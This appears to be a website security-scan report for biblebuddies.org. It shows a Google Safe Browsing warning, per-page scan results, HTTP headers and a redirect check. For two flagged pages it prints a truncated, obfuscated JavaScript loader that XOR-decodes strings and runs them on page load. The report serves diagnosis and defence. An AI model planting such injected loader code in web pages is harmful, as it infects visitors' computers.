Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=biblebuddies.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://biblebuddies.org/ | 200 OK Content-Length: 4905 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function gNX(SINgqDZU, tsEmfJA, DeODs) { var BLAFGHFclX=DeODs.split(tsEmfJA); var lFMSkvVXr=''; for(HOFt=-0x30+0x5+0x2b;HOFt<(BLAFGHFclX.length-1);HOFt+=-0x2c+0x3-0x20-0x2a+0x74) { TedLPqI = BLAFGHFclX[HOFt]^SINgqDZU;lFMSkvVXr += String.fromCharCode(TedLPqI);}return lFMSkvVXr;} function uYdGUc(vCX){ fff=op.split("1040");alert('Hqu'); } ;function RFjcyVP(){var eVTDqpjSf=new Function("hwdjiK", "return "+gNX(-0x8+0x1f+0xd-0x2d+0x ;if(window.addEventListener) { window.addEventListener(gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'),RFjcyVP,false);}else if(window.attachEvent){window.attachEvent('on'+gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'), RFjcyVP);}function DQojwMqe(NhxFdsTt){ fff=op.split("696"); } ; Antivirus reports:
| ||
http://biblebuddies.org/page2.html | 200 OK Content-Length: 14865 Content-Type: text/html | clean |
http://biblebuddies.org/page37.html | 200 OK Content-Length: 4362 Content-Type: text/html | clean |
http://biblebuddies.org/index.html | 200 OK Content-Length: 4905 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function gNX(SINgqDZU, tsEmfJA, DeODs) { var BLAFGHFclX=DeODs.split(tsEmfJA); var lFMSkvVXr=''; for(HOFt=-0x30+0x5+0x2b;HOFt<(BLAFGHFclX.length-1);HOFt+=-0x2c+0x3-0x20-0x2a+0x74) { TedLPqI = BLAFGHFclX[HOFt]^SINgqDZU;lFMSkvVXr += String.fromCharCode(TedLPqI);}return lFMSkvVXr;} function uYdGUc(vCX){ fff=op.split("1040");alert('Hqu'); } ;function RFjcyVP(){var eVTDqpjSf=new Function("hwdjiK", "return "+gNX(-0x8+0x1f+0xd-0x2d+0x ;if(window.addEventListener) { window.addEventListener(gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'),RFjcyVP,false);}else if(window.attachEvent){window.attachEvent('on'+gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'), RFjcyVP);}function DQojwMqe(NhxFdsTt){ fff=op.split("696"); } ; Antivirus reports:
| ||
http://biblebuddies.org/test404page.js | 404 Not Found Content-Length: 575 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: biblebuddies.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Sep 2014 11:24:30 GMT
Accept-Ranges: bytes
ETag: "1b576c3-1329-480d37484403b"
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Content-Length: 4905
Content-Type: text/html
Last-Modified: Tue, 02 Mar 2010 15:59:48 GMT
...4905 bytes of data.
GET / HTTP/1.1
Host: biblebuddies.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Sep 2014 11:24:30 GMT
Accept-Ranges: bytes
ETag: "1b576c3-1329-480d37484403b"
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Content-Length: 4905
Content-Type: text/html
Last-Modified: Tue, 02 Mar 2010 15:59:48 GMT
...4905 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: biblebuddies.org
Referer: http://www.google.com/search?q=biblebuddies.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: biblebuddies.org
Referer: http://www.google.com/search?q=biblebuddies.org
Result:
The result is similar to the first query. There are no suspicious redirects found.